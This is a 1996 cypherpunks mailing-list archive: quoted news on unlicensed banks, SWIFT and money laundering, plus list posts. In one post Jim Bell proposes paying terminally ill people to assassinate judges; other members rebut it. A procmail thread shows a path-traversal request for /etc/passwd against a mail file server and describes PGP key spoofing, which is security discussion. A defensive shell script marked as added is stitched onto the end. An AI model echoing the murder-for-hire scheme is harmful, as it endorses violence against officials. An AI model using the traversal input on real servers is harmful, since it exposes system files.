]> ]> These so-called "banks" offer a variety of banking services, often at ]> lower fees and better interest rates than legitimate banks offer. What ]> makes them different from a legitimate bank - and attractive to money ]> launderers -- is that they are not licensed by any U.S. banking agency ]> and thus do not have to meet regulatory standards. ]> ]> Because the OCC and other federal bank regulators are not investigative ]> agencies, they can do little more than report these institutions to ]> those who are. If the entities are found to be operating a bank without ]> a license they can be prosecuted under the Glass-Steagell Act (Title 12, ]> USC Sec. 378(a)(2)). ]> ]> Such prosecutions are rare. In one case in 1994, initiated by Federal ]> Reserve Board examiners, the principals of Lombard Bank, Ltd., were ]> charged with operating an unauthorized bank through a payable-through ]> account at American Express Bank International in Miami. Lombard, which ]> had been "licensed" in the South Pacific money laundering haven of ]> Vanuatu, offered its Central American customers virtually full banking ]> services in the U.S. through its PTA (MLA, Sep. 1994). ]> ]> Earlier this year, the OCC released a list of more than 50 "banks" known ]> to be operating without authorization. OCC officials say the number ]> grows steadily. Some of the "banks" say they are licensed by foreign ]> countries or U.S. states to conduct banking business. Others, such as ]> the Swiss Trade & Commerce Trust, Ltd., of Belize, continue to offer ]> services in the U.S. despite edicts from foreign banking authorities to ]> cease doing business. ]> ]> The unauthorized entities have a common trait. They usually have names ]> that are similar to those of well-known legitimate institutions. 
The OCC ]> list includes the Bank of England, a Washington, D.C., entity not ]> associated with London's famous "old lady on Threadneedle Street" and ]> Citicorp Financial Services, a Beverly Hills firm not associated with ]> the better-known institution of that name. It also includes the First ]> Bank of Internet, which heralds itself as the first bank in cyberspace. ]> ]> Through its periodic "special alerts," the OCC warns banks to "view with ]> extreme caution any proposed transaction involving any of the listed ]> entities." It makes no effort to educate members of the general public ]> who unknowingly place their money and trust in those uninsured ]> institutions. ]> ]> ]> ]> ]> American Banker: Friday, August 30, 1996 ]> ]> Swift Near Alliance in Trade Document Automation ]> ]> By STEVEN MARJANOVIC ]> ]> Swift, the international banking telecommunications network, wants to ]> play a bigger role in trade finance and the exchange of related ]> documentation. ]> ]> Sources said the Brussels-based organization will soon take a position-- ]> perhaps as early as its September board meeting-- on whether to work on ]> trade automation in cooperation with another consortium, called Bolero. ]> ]> Such a move would involve an increase in nonbank participants on a ]> bank-owned network that has approached such liberalization cautiously. ]> ]> Swift, formally the Society for Worldwide Interbank Financial ]> Telecommunication, is used by 5,300 banks for exchanging messages in ]> such areas as funds transfer, foreign exchange, and securities. ]> ]> The network averaged about 2.7 million messages a day in July, ]> representing daily dollar volumes exceeding $2 trillion. ]> ]> Officials said Swift is nearing a decision to work with the Bolero ]> Association, which is forming an electronic registry for the so-called ]> "dematerializing" of trade documents. 
Swift could provide the "platform" ]> for allowing banks and corporations to exchange such documentation as ]> letters of credit and bills of lading. ]> ]> Bolero was formed in 1994 with funding from the European Commission, but ]> has not formulated concrete operating plans. Its members include ]> Citicorp, Barclays Bank PLC, and other multinational banks and ]> corporations. ]> ]> Peter Scott, trade services market director at Swift, said it has been ]> in discussions with London-based Bolero since December 1995 about ]> joining forces to automate the exchange of trade documents. ]> ]> "Bankers are beginning to sense both the opportunities in those areas ]> and the threats to them from an intermediary stepping in and potentially ]> taking away the business," Mr. Scott said. ]> ]> Trade-document capability "is not a heavily utilized area within Swift ]> at the present time," he said. ]> ]> The potential in automation is obvious to Bolero officials. At the New ]> York Banktrade Conference recently, John McKessy, the association's ]> North American representative, said the annual value of goods moved ]> internationally approaches $4 trillion. ]> ]> He estimated current international trade requires some three billion ]> documents to be issued and managed. ]> ]> The cost of dealing with paper alone eats up about 7% of the total value ]> of those goods, as much as $280 billion, Mr. McKessy said. ]> ]> Bank revenues from issuing letters of credit last year were just over $1 ]> billion, according to a soon-to-be-released survey by the U.S. Council ]> on International Banking. ]> ]> Anthony K. Brown, senior vice president of trade services at MTB Bank, ]> described trade transaction processing as "extremely cumbersome and ]> tedious, prone to mistakes and delays (that) can be a hindrance to the ]> completion of a transaction." ]> ]> MTB is a $400 million-asset merchant bank based in New York. About 80% ]> of its $100 million in loans are trade-related. 
]> ]> The paper-shuffling costs are not borne entirely by banks. Import/export ]> companies, insurers, freight forwarders, and various government ]> inspection agencies are also involved. ]> ]> "The question is whether Swift wants to do it," said Dan Taylor, ]> president of the New York-based U.S. Council. ]> ]> "Swift is going to act fairly quickly on this," he added. ]> ]> Mr. Taylor said Swift officials will likely grapple once again with the ]> political and philosophical issues of giving nonbanks more access to ]> Swift, and to payment systems generally. ]> ]> In 1995, the network granted partial access to nonbanks after years of ]> heated debate. ]> ]> "You always have this push and pull, where some banks would like Swift ]> to do certain things" while others want the network to focus on the ]> money transfer business, Mr. Taylor said. ]> ]> "If Bolero succeeds and Swift joins, I think it will move fairly ]> rapidly, but I'm not sure that Bolero is going to be the only thing out ]> there." ]> ]> He said Bolero might evolve using value-added networks - or intranets - ]> like the IBM Global Network and General Electric Information Services ]> Co., or perhaps even the Internet. ]> ]> Indeed, another member of Bolero, CSI Complex Systems Inc., New York, is ]> apparently talking to several providers of private, value-added networks ]> and may soon enter a contract with one. ]> ]> CSI letter-of-credit software leads the pack in banking, with about a ]> 16% market share, Mr. Taylor said. ]> ]> The company recently formed a business unit called Electronic Documents ]> International, which has developed an Internet-based system for ]> initiating letters of credit. CSI spokesman George Capsis said the ]> software, Import.com, creates "about 30 key documents involved in ]> international trade." ]> ]> The Internet, enhanced with security features, may help the trade ]> industry reduce paper-related costs, especially at smaller companies ]> overseas. 
]> ]> CSI managing director Andre Cardinale said customers need only to "dial ]> into a bank's Internet server, pull up the Import.com application, and ]> actually fill in the details to create a new letter of credit or an ]> amendment to an existing one." ]> ]> While Bolero may find a place on the Internet or a GE-type network, Mr. ]> Cardinale said the ultimate push may yet come from the banking industry ]> working collectively through Swift. ]> ]> He said Swift opposition from nonbank constituencies that are concerned ]> the telecommunications cooperative will be more sympathetic to banks ]> when disputes arise. ]> ]> But "if Swift does it," he added, "it will bring banks into the universe ]> far more - pardon the pun - swiftly." ]> ]> ]> Crain's New York Business: August 26, 1996 ]> ]> Bloomberg to Detail Growth of Information Empire ]> ]> Michael Bloomberg made a name for himself on Wall Street with his ]> trading acumen and mastery of the computer systems that were becoming ]> crucial to success in the securities business. ]> ]> But no one suspected when he left Salomon Brothers in 1981 that in the ]> next decade he would build the fastest-growing provider of financial ]> information in the world. ]> ]> Mr. Bloomberg, whose company Bloomberg Financial Markets has estimated ]> sales of $600 million, will be the keynote speaker at the fifth annual ]> Crain's ''Growing a Business Expo,'' to be held this year on Thursday, ]> Oct. 24. ]> ]> The event will take place at the New York Hilton & Towers from 8 a.m. to ]> 1 p.m. It is presented by Citibank and co-sponsored by Con Edison and ]> Empire Blue Cross and Blue Shield. ]> ]> Last year, more than 1,000 growing business owners and managers attended ]> the expo, which provides information for companies operating in the city ]> regarding potential suppliers, financial resources and government ]> programs. ]> ]> The cost to attend the event is $45 and includes a continental ]> breakfast. 
Individuals registering before Sept. 6 can bring a colleague ]> for free. To register, call Flagg Management at (212) 286-0333. ]> ]> In addition to Mr. Bloomberg's speech, attendees will be able to attend ]> seminars on financing and other help available from the city, financing ]> techniques, energy cost savings programs and how to reduce health ]> insurance costs. An expected 135 exhibitors will be offering products ]> and services of use to growing companies. ]> ]> Crain's New York Business editors will discuss how a growing business ]> can get coverage in Crain's and in other publications. ]> ]> The heart of Mr. Bloomberg's empire is a news gathering operation that ]> sends information through 62,000 computer terminals installed on the ]> desks of investment professionals around the nation. His company ]> provides the latest financial news and sophisticated tools to analyze ]> information. ]> ]> The company he has built is noted for its lack of bureaucracy despite ]> its growth to 2,000 employees. Its hallmarks are hands-on leadership and ]> an entrepreneurial atmosphere where employees receive perks such as free ]> food. ]> ]> Mr. Bloomberg has extended his reach to include an all-news radio ]> station in New York, WBBR; Bloomberg Personal TV; syndicated television ]> shows; a monthly personal finance magazine; and a similar magazine for ]> institutional investors. ]> ]> ]> American Banker: Friday, September 6, 1996 ]> ]> America Online Opens a New Banking Channel ]> ]> By DREW CLARK ]> ]> Nineteen banks - national home banking stalwarts such as Citicorp and ]> BankAmerica, plus a complement of less prominent regionals - have ]> climbed onto the America Online bandwagon. ]> ]> Most already offer their customers several options for banking via ]> personal computer and view America Online, with its six million ]> subscribers, as a way to appeal to a broad cross-section of computer- ]> literate consumers. 
]> ]> Fourteen of the AOL banking partners will be delivering services through ]> BankNow, a software package developed for the interactive network by ]> Intuit Inc. ]> ]> The other five banks have opted to use their own software. One of them - ]> Security First Network Bank, which operates entirely on the Internet - ]> will invite AOL users in through their Web browsers. ]> ]> With its announcement this week, America Online Inc. takes its place ]> among the many alternative "channels" for on-line banking. ]> ]> Many of the banks on AOL's list are simultaneously cooperating with ]> other companies that are themselves competitors, such as Intuit and ]> Microsoft Corp., suppliers of the Quicken and Money financial management ]> software, respectively. ]> ]> Also crossing competitive lines, America Online said its subscribers ]> will be able to bank from home with PC software from three suppliers ]> other than Intuit: Checkfree Corp., Online Resources and Communications ]> Corp., and Visa Interactive. ]> ]> "Everyone understands that there is competition in the home banking ]> arena," said David Baird, general manager of the personal finance ]> division at America Online, based in Dulles, Va. "To align ourselves ]> with exclusively one company would be a mistake." ]> ]> Intuit can count on 14 initial bank users of BankNow. Spokesmen for the ]> other three system vendors declined to say when they expect to have home ]> banking products available for the AOL channel. ]> ]> Experts noted that AOL and Intuit could be a strong tandem, in that they ]> dominate their respective businesses. ]> ]> Intuit's Quicken is the leading brand in personal finance software. The ]> company claims more than 9 million active users and a market share of ]> about 80%. ]> ]> America Online's subscriber base of six million is as big as those of ]> its next two competitors, Compuserve and Prodigy, combined. 
]> ]> The financial institutions currently offering BankNow are: American ]> Express, Bank of Stockton (Calif.), Centura Banks Inc., Commerce Bank of ]> Kansas City, Mo., Commercial Federal of Omaha, Compass Bank of Alabama, ]> CoreStates Financial Corp., Crestar Financial Corp., First Chicago NBD ]> Corp., Laredo (Tex.) National Bank, M&T Bank of Western New York, ]> Marquette Bank of Minneapolis, Sanwa Bank California, and Union Bank of ]> California. ]> ]> More plan to offer BankNow-based services through AOL later this year: ]> BankAtlantic of Florida, Bank of Boston, First Hawaiian Bank, First ]> Michigan Bank, Mellon Bank, Signet Bank, and U.S. Bank of Oregon. ]> ]> Unlike Quicken, BankNow software is available free to America Online ]> subscribers. ]> ]> Banks' fees will vary. First National Bank of Chicago said it will ]> charge $3.95 a month for on-line banking and $9.95 a month for other ]> services that include bill payment. ]> ]> Centura Banks Inc. said it will offer on-line banking free, and charge ]> $5.95 a month for bill payment. ]> ]> Intuit officials declined to disclose what its Intuit Services Corp. ]> processing unit will charge to handle these transactions for banks. ]> ]> Some of Intuit's larger bank partners chose not to offer BankNow because ]> they already promote their own PC banking programs. ]> ]> For example, Citicorp, First Union, and Wells Fargo each support ]> Quicken, but passed on BankNow. Instead, they are paying a premium for a ]> "button" on America Online's banking screen that will eventually link ]> users to a proprietary home banking program. ]> ]> ]> ]> AP Online: Thursday, September 5, 1996 ]> ]> House Probes Money Laundering ]> ]> By ROB WELLS ]> ]> House Banking Committee members on Thursday urged a Treasury Department ]> agency to step up its efforts to halt money laundering by Mexican drug ]> lords. ]> ]> Rep. 
Spencer Bachus, R-Ala., urged the Financial Crimes Enforcement ]> Network to put in place new regulations to plug a significant loophole ]> that allows Mexico's drug dealers to place their ill-gotten profits back ]> into the U.S. ]> ]> Bachus, chairman of the House Banking oversight subcommittee, said ]> Congress gave authority to FinCen in 1994 to put in place new rules that ]> would prevent drug dealers from using foreign bank drafts, a type of ]> check, to evade currency reporting restrictions. ]> ]> ''That effort is long, long overdue,'' Bachus said. ]> ]> Rep. Henry Gonzalez, D-Texas, asked the agency to provide further ]> details about suspected money laundering in his home town of San ]> Antonio, particularly the source of a $3 billion cash surplus in the San ]> Antonio Federal Reserve Bank. ]> ]> The issue arose as Bachus' panel began exploring the dramatic rise of ]> narcotics traffic along the 2,000 mile long U.S.-Mexico border, and the ]> ease with which drug dealers can ship their profits to the south. Money ]> laundering refers to the practice by which drug dealers, mobsters and ]> others funnel their illegal profits into the banking system through ]> businesses or other means. ]> ]> Bachus said estimates of drug profits laundered through Mexico range ]> from $6 billion to $30 billion per year. Stanely E. Morris, FinCen's ]> director, defended his agency's record, saying a combination of new ]> rules and tougher enforcement in the past decade has ''made it more ]> difficult to launder money in the U.S.'' and increased the costs of ]> money laundering. Morris' agency enforces the Bank Secrecy Act, a key ]> weapon against money laundering. ]> ]> As for the new rules aimed at foreign bank drafts, Morris said the ]> regulations are more difficult than first expected because such ]> restrictions also could hinder legitimate commerce. He said the proposal ]> would be released soon. 
]> ]> FinCen is working on other fronts to combat money laundering, which ]> includes a new computer system that tallies bank fraud to help ]> regulators gain an early warning of money laundering. ]> ]> In addition, the Clinton Administration assisted Mexico in adopting new ]> anti-money laundering rules earlier this year. And Treasury Secretary ]> Robert Rubin convened a conference of 29 nations in December 1995 to ]> focus on the money laundering problem. ]> ]> One committee member, Rep. Maxine Waters, D-Calif., addressed the ]> political context of the hearings. ]> ]> Waters said she was suspicious that the Republican-led Congress was ]> holding ''a rash of hearings this month ... on the subject of drugs just ]> as Presidential candidate Dole tries to use the issue as part of his ]> campaign strategy against President Clinton.'' ]> ]> Waters said if the GOP-led House ''is truly serious about the impact of ]> drugs'' it should hold hearings about charges raised in a San Jose ]> Mercury News investigative series last month concerning the role ]> CIA-backed rebels in Nicaragua played in bringing crack cocaine and ]> weapons to Los Angeles and other cities. ]> ]> Bachus told Waters the hearing wasn't motivated by politics and that he ]> had personally been involved in anti-drug efforts prior to his election ]> to Congress. ]> ]> --- ]> ]> Dr.Dimitri Vulis KOTM ]Fuckhead. Is this any more readable? See, I put a ']' in front of the quoted material. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From unicorn at schloss.li Sat Sep 21 22:30:07 1996 From: unicorn at schloss.li (Black Unicorn) Date: Sun, 22 Sep 1996 13:30:07 +0800 Subject: The GAK Momentum is Building... 
In-Reply-To: <199609220058.RAA10810@mail.pacifier.com> Message-ID: On Sat, 21 Sep 1996, jim bell wrote: > At 01:58 PM 9/20/96 -0400, Black Unicorn wrote: > >On Wed, 18 Sep 1996, Dale Thorn wrote: > >> My comment: Once the big Corp.'s get used to the new game, they'll put > >> the non-critical stuff out there for Mr. Freeh, and for the really > >> secret data, if the cops confiscate anything they can't read, the Corp. > >> security will put it off on a fall-guy, even as high as the CEO if > >> necessary. I just wanna see one case where a federal judge will try to > >> bleed a big company for contempt for "refusing" to decode and hand over > >> some ostensibly encrypted data. Matter of fact, there are probably cases > >> similar to this that have already been through the appeals courts. > > > >Several. Most involve foreign banks refusing to turn over records to U.S. > >courts. Most result in powerfully large fines imposed on banks, often on > >a per diem basis. > > > But as usual, you ignore the obvious solution to the problem. Let's suppose > the amount of the fine is set at $1000 per day. Actuarially, this works out > to be the interest (at 5% per year) on $7.3 million dollars in principle. > In other words, if you can eliminate the fine for less than $7.3 million, > you're better off doing it. Fines tend to run in the ten thousands per diem. > > Naturally, you won't even consider the possibility of going outside the > system to solve a problem. I hardly want to get back into this debate. I live outside the system. I do not murder people. . The rest of us notice that there are probably > thousands of terminally-ill people who would gladly act as a human kamikaze > and get rid of any judge inclined to impose such a fine, for a payment of 1% > of this principle amount to a family member or loved one, leaving 99% > available for the few other judges foolish enough to basically commit > suicide by taking up a futile gesture. 
> > This kind of operation is best arranged by what might be described as an > "insurance company," which will divide the risk among client companies until > everyone learns what the score really is. It wouldn't take long before no > such fines are ever imposed. > > But nah, this is much too complex for you. Coming from someone willing to prey on the despair of termanally ill individuals this stands as a compliment. Again, I propose that Mr. Bell would be the first to go in "his" system. > > Jim Bell > jimbell at pacifier.com > -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From markm at voicenet.com Sat Sep 21 23:11:14 1996 From: markm at voicenet.com (Mark M.) Date: Sun, 22 Sep 1996 14:11:14 +0800 Subject: Bernstein hearing: The Press Release In-Reply-To: <199609212340.QAA07773@mail.pacifier.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Sat, 21 Sep 1996, jim bell wrote: > At the risk of being a devil's advocate, let me suggest that you are > conceding too much even with the preceding paragraph. The 1st amendment > says nothing about preventing speech which (even admittedly) would result > in "direct, immediate, and irreparable damage to our nation or its people." I believe there is one section in the Constitution that says that speech harmful to national security is not protected under the 1st amendment. However, I don't agree with this provision at all. "National security" is a phrase that is applied to anything from information on the JFK assassination to DES source code. > I could list many more, but won't because of lack of space. But notice > that, presumably, each and every one of these incidents was AT ONE TIME kept > secret, arguably because it would be better for the country to do so. Thus, > presumably it was thought or at least asserted that to reveal them would > cause "damage to our nation or its people." 
If secret information was released, it would cause most people to completely lose respect for the government (some people call this damage -- I call it progress). > > The way you've written the paragraph I've quoted above, it appears that you > are somehow acknowledging that there are certain circumstances where certain > types of speech are controllable because they are "harmful," but you fail to > explain how even this constitutional restriction is tolerable. Frankly, I > don't see it! What you need to do is to be far more specific about such > speech and exactly where it can be controlled. There may be certain circumstances under which speech can be directly harmful. Military operations and missile launch codes are things that should be kept secret. Information about high-powered weapons should be too. If the Japanese had been able to get information about how to build A-bombs during WWII, major cities in the U.S. probably would have been completely wiped out. I don't like the idea that the government has the power to decide what's harmful and what isn't, but there are beneficial uses of the provision. Mark - -- PGP encrypted mail preferred. 
Key fingerprint = d61734f2800486ae6f79bfeb70f95348 http://www.voicenet.com/~markm/ From jimbell at pacifier.com Sat Sep 21 23:17:29 1996 From: jimbell at pacifier.com (jim bell) Date: Sun, 22 Sep 1996 14:17:29 +0800 Subject: USA_exe Message-ID: <199609220342.UAA17509@mail.pacifier.com> At 12:23 AM 9/22/96 GMT, John Young wrote: >On Sep 21, 1996 16:19:53, 'jim bell ' wrote: >>Pardon me, but what's wrong with this? Follow the news more closely, and >>you'll hear of a group which is operating in southern Mexico, the "EPR," which >>is killing off government employees, politicians, and police. True, they're >>not implementing the mathematical, digital-cash basis behind AP, but they >see >>to be making good progress against the corruption which is Mexico. >>Increase their productivity by a factor of 10, and the Mexican government would >>be terrified. Increase it by 100, and the Mexican government would fall within >>a few months. > > >Jim's makes a good, if gruesome, point here, about the vicious realities of >do-or-die AP, by even our own apple pie government. > > >The Washington Post reports at length today on the Defense Department's >disclosure yesterday of heretofore classified trainging manuals used in the >School of the Americas to instruct Latino troops on killing a wide range of >civilians for political purposes. 
>To read "Army Instructed Latins On Executions, Torture," about your tax >dollars working the AP angle: > >http://jya.com/usaexe.txt This article is so wonderfully appropriate to the discussion that I can't resist re-posting it here. I think the part about only discovering the problem in 1992 after 10 years is particularly precious. In addition, I notice that a listing of the appropriate targets these army people were supposed to "neutralize" are listed as: The manual on "Terrorism and the Urban Guerrilla" says that "another function of the CI agents is recommending CI targets for neutralizing. The CI targets can include personalities, installations, organizations, documents and materials ... the personality targets prove to be valuable sources of intelligence. Some examples of these targets are governmental officials, political leaders, and members of the infrastructure." full article posted below: The Washington Post, September 21, 1996, pp. A1, A9. Army Instructed Latins On Executions, Torture Manuals Used 1982-91, Pentagon Reveals By Dana Priest U.S. Army intelligence manuals used to train Latin American military officers at an Army school from 1982 to 1991 advocated executions, torture, blackmail and other forms of coercion against insurgents, Pentagon documents released yesterday show. Used in courses at the U.S. Army's School of the Americas, the manual says that to recruit and control informants, counterintelliigence agents could use "fear, payment of bounties for enemy dead, beatings, false imprisonment, executions and the use of truth serum," according to a secret Defense Department summary of the manuals compiled during a 1992 investigation of the instructional material and also released yesterday. 
A summary of the investigation and four pages of brief, translated excerpts from the seven Spanish-language manuals were released last night by the Defense Department, which recently has taken to making controversial information available in the evenings, after the deadlines of the prime-time network television news programs. The Army School of the Americas, long located in Panama but moved in 1984 to Fort Benning, Ga, has trained nearly 60,000 military and police officers from Latin America and the United States since 1946. Its graduates have included some of the region's most notorious human rights abusers, among them Roberto D'Aubuisson, the leader of El Salvador's right-wing death squads; 19 Salvadoran soldiers linked to the 1989 assassination of six Jesuit priests; Gen. Manuel Antonio Noriega, the deposed Panamanian strongman; six Peruvian officers linked to killings of students and a professor; and Col. Julio Roberto Alpirez, a Guatemalan officer implicated in the death of an American innkeeper living in Guatemala and to the death of a leftist guerrilla married to an American lawyer. The Defense Department said the school's curriculum now includes mandatory human rights training and it is an effective way to help promote military professionalism in a region where that concept is still nascent. "The problem was discovered in 1992, properly reported and fixed," said Lt. Col. Arne Owens, a Pentagon spokesman. "There have been a lot of great changes at the School of the Americas." When reports of the 1992 investigation surfaced this year during a congressional inquiry into the CIA's activities in Guatemala, spokesmen for the school denied the manuals advocated such extreme methods of operation, which were in violation of Army policy and law at the time they were in use. The 1992 investigation concluded the inclusion of the methods was the result of bureaucratic oversight. "It is incredible that the use ... since 1982 ... 
evaded the established system of doctrinal controls," said the report of the investigation, conducted by the office of the assistant to the secretary of defense for intelligence oversight. "Nevertheless, we could find no evidence that this was a deliberate and orchestrated attempt to violate DoD or Army policies." The manuals were complied by Army intelligence officials using "outdated instructional material without the required doctrinal approval" from the Army Intelligence School, the investigation report said. The material was based, in part, on training instructions used in the 1960s by the Army's Foreign Intelligence Assistance Program, entitled "Project X." The 1992 investigation also found the manual was distributed to thousands of military officers from 11 South and Central American countries, including Guatemala, El Salvador, Honduras and Panama, where the U.S. military was heavily involved in counterinsurgency. One manual, entitled "Handling of Sources," also "discloses classified [informant] methodology that could compromise Army clandestine intelligence modus operandi," the 1992 investigation found. Another manual, entitled "Counterintelligence," contained "sensitive Army counterintelligence tactics, techniques and procedures." The Defense Department yesterday said the 1992 investigators found two dozen objectionable passages among the 1,169 pages of instruction. For instance, the manual entitled "Handling of Sources" says, "The CI [counterintelligence] agent could cause the arrest of the employees [informants] parents, imprison the employee or give him a beating" to coerce cooperation. On several occasions it uses the words "neutralization" or "neutralizing," which was commonly used at the time as a euphemism for execution or destruction, a Pentagon official said. The manual on "Terrorism and the Urban Guerrilla" says that "another function of the CI agents is recommending CI targets for neutralizing. 
The CI targets can include personalities, installations, organizations, documents and materials ... the personality targets prove to be valuable sources of intelligence. Some examples of these targets are governmental officials, political leaders, and members of the infrastructure." The Defense Department continues to try to collect the manuals but, as the 1992 investigation noted, "due to incomplete records, retrieval of all copies is doubtful." Rep. Joseph P. Kennedy II (D-Mass.), an advocate of closing the school, said in a statement last night that the manuals "show what we have suspected all along, that taxpayers' money has been used for physical abuse." Kennedy said, "The School of the Americas, a Cold War relic, should be shut down."

[End]

Jim Bell
jimbell at pacifier.com

From ichudov at algebra.com Sun Sep 22 00:04:11 1996
From: ichudov at algebra.com (Igor Chudov @ home)
Date: Sun, 22 Sep 1996 15:04:11 +0800
Subject: How to use procmail
In-Reply-To: <199609050006.TAA07462@homeport.org>
Message-ID: <199609220423.XAA00811@manifold.algebra.com>

Adam Shostack wrote:
> :0
> * From bal at swissnet.ai.mit.edu
> {
> :0 h
> * >10000
> /dev/null
>
> :0 h
> *^Subject:.*no keys match
> /dev/null
>
> :0:
> *Subject: Your command, ADD
> $DEFAULT
>
>
> :0E
> | pgp +batchmode -fka

Isn't this vulnerable to "deadbeef" attacks?

I can also see an attack when someone sends you an email with the spoofed "From " address and a user name that is the same (or almost the same) as that of your trusted parties.

Suppose that you correspond with mrx at provider.com and you use encryption command

pgp -eaf mrx

Then I can send you a bogus email containing a key for mrx at bogus.com and next time you encrypt something for your friend nrx at provider.com, you will actually encrypt it with the wrong key. If I intercept your email, your message to mrx can be compromised.

> # basic file server. Only sends whats in .outbound
> :0
> * ^Subject: (SEND|get) [0-9a-z][-_/0-9a-z.]+$
> * !^Subject:.*[ /.]\.
> * !^FROM_DAEMON
> {
> # FILE=`formail -x Subject: | sed 's/.* //'`
> FILE=`sed -n -e '/Subject:/s/.* //p' -e '/^$/q'`
>
> :0c
> | (formail -rt -A"Precedence: junk";\
> cat $HOME/.outbound/$FILE) | $SENDMAIL -t

*If* .outbound has some subdirectories (say subdir), How about this email:

From: dumbass at aol.com
Subject: GET subdir/../../../../etc/passwd
Reply-To: blin at algebra.com

xxx

- Igor.

From pstira at escape.com Sun Sep 22 00:07:52 1996
From: pstira at escape.com (pstira at escape.com)
Date: Sun, 22 Sep 1996 15:07:52 +0800
Subject: DL in exchange for fingerprint
In-Reply-To: <199609191223.IAA13606@jafar.issl.atl.hp.com>
Message-ID:

On Thu, 19 Sep 1996, Jeff Barber wrote:
> Oh joy. You no longer need to be arrested to get fingerprinted
> in Georgia. On the front page of Wednesday's Atlanta Journal, under
> the headline "Now you can get driver's license in minutes":

> Just what I would have called it: a great idea. Is it true that 31
> other states take your fingerprint as part of the license application?
> I feel sick.

I know for sure Hawai'i does -- and not just for licenses. They take em for civil ID's too -- and are incredibly bitchy about forms of ID.

-Millie

From azur at netcom.com Sun Sep 22 00:15:31 1996
From: azur at netcom.com (Steve Schear)
Date: Sun, 22 Sep 1996 15:15:31 +0800
Subject: Kill 'em and let God sort it out, was Re: The GAK Momentum is Building...
Message-ID:

> jim bell wrote:
>Naturally, you won't even consider the possibility of going outside the
>system to solve a problem.
The rest of us notice that there are probably >thousands of terminally-ill people who would gladly act as a human kamikaze >and get rid of any judge inclined to impose such a fine, for a payment of 1% >of this principle amount to a family member or loved one, leaving 99% >available for the few other judges foolish enough to basically commit >suicide by taking up a futile gesture. > If AP came to be seen as an acceptable way for business and citizens to right egregious wrongs it would quickly lead to a 'law of the jungle' situation, which I think any sane person would reject as the cure being worse than the disease. However, if governments (especially ours) continue to expand their implied authority and greatly diminish personal liberties we all took for granted were inalienable human rights (in our own best interest, of course), a time may come when a bit of rebellion may be the only viable alternative for self-correction. I pray it never comes to this, but Thomas Jefferson contemplating this said: "God forbid we should ever be 20 years without such a rebellion. . . .What country can preserve its liberties if their rulers are not warned from time to time that their people preserve the spirit of resistance?. . .The tree of liberty must be refreshed from time to time with the blood of patriots and tyrants." -- Thomas Jefferson, regarding Shays' Rebellion and anarchy. PGP Fingerprint: FE 90 1A 95 9D EA 8D 61 81 2E CC A9 A4 4A FB A9 --------------------------------------------------------------------- Snoop Daty Data | Internet: azur at netcom.com Grinder | Voice: 1-702-655-2877 Sacred Cow Meat Co. | Fax: 1-702-658-2673 7075 W. Gowan Road, #2148 | Las Vegas, NV 89129 | --------------------------------------------------------------------- Just say NO to prescription DRUGS. 
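Returning to the "How to use procmail" message above, where Igor Chudov asks about a `GET subdir/../../../../etc/passwd` request against the `.outbound` file server: the following is an added example, not code from the thread, of one way to validate the requested name before it reaches `cat`. It goes slightly beyond the message by also refusing symlinks that lead out of the directory; the function names `extract_request` and `resolve_outbound`, the lower-case-only allow-list and the temporary directory layout are assumptions made for the demonstration.

```shell
#!/bin/sh
# Added example, not from the thread: validate the filename taken from a
# "Subject: GET <file>" request before a file-server recipe passes it to cat.
# Function names and the directory layout below are assumptions.
LC_ALL=C; export LC_ALL   # keep [a-z] from matching upper case in other locales
unset CDPATH              # make sure cd never searches (or prints) other paths

# Print the last word of the first Subject: header; stop at the end of the
# headers so a "Subject:" line in the body is never used.
extract_request() {
    awk '/^$/ { exit } /^[Ss]ubject:/ { print $NF; exit }'
}

# resolve_outbound BASE NAME
# Prints the canonical path and returns 0 only when NAME is a regular file
# that really lives under BASE; returns 1 otherwise.
resolve_outbound() {
    base=$1
    name=$2
    # 1. Allow-list of characters; no empty or absolute names.
    case $name in
        ''|/*|*[!_./0-9a-z-]*) return 1 ;;
    esac
    # 2. No empty, "." or ".." path component anywhere in the name.
    case "/$name/" in
        *//*|*/./*|*/../*) return 1 ;;
    esac
    # 3. Resolve symlinks in the directory part and check containment.
    real_base=$(cd "$base" 2>/dev/null && pwd -P) || return 1
    real_dir=$(cd "$(dirname "$base/$name")" 2>/dev/null && pwd -P) || return 1
    case "$real_dir/" in
        "$real_base"/*) ;;
        *) return 1 ;;
    esac
    # 4. The final component must be a plain file, not a symlink.
    target=$real_dir/$(basename "$name")
    [ -f "$target" ] && [ ! -L "$target" ] || return 1
    printf '%s\n' "$target"
}

# Constructed demonstration: a throw-away .outbound tree and four requests.
demo() {
    tmp=$(mktemp -d) || return 1
    out=$tmp/home/.outbound
    mkdir -p "$out/subdir"
    echo 'public faq' > "$out/subdir/faq.txt"
    echo 'not for export' > "$tmp/home/private.txt"
    ln -s "$tmp/home" "$out/up"                     # directory symlink leaving .outbound
    ln -s ../../private.txt "$out/subdir/link.txt"  # file symlink leaving .outbound
    for subject in 'GET subdir/faq.txt' 'GET subdir/../../../../etc/passwd' \
                   'GET up/private.txt' 'GET subdir/link.txt'; do
        req=$(printf 'From: someone@example.invalid\nSubject: %s\n\nxxx\n' "$subject" \
              | extract_request)
        if path=$(resolve_outbound "$out" "$req"); then
            echo "SEND  $req -> $path"
        else
            echo "DENY  $req"
        fi
    done
    rm -rf "$tmp"
}
demo
```

In a recipe, the `cat` would be given the path printed by `resolve_outbound` rather than `$HOME/.outbound/$FILE`, and the reply would be skipped when the function returns non-zero.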
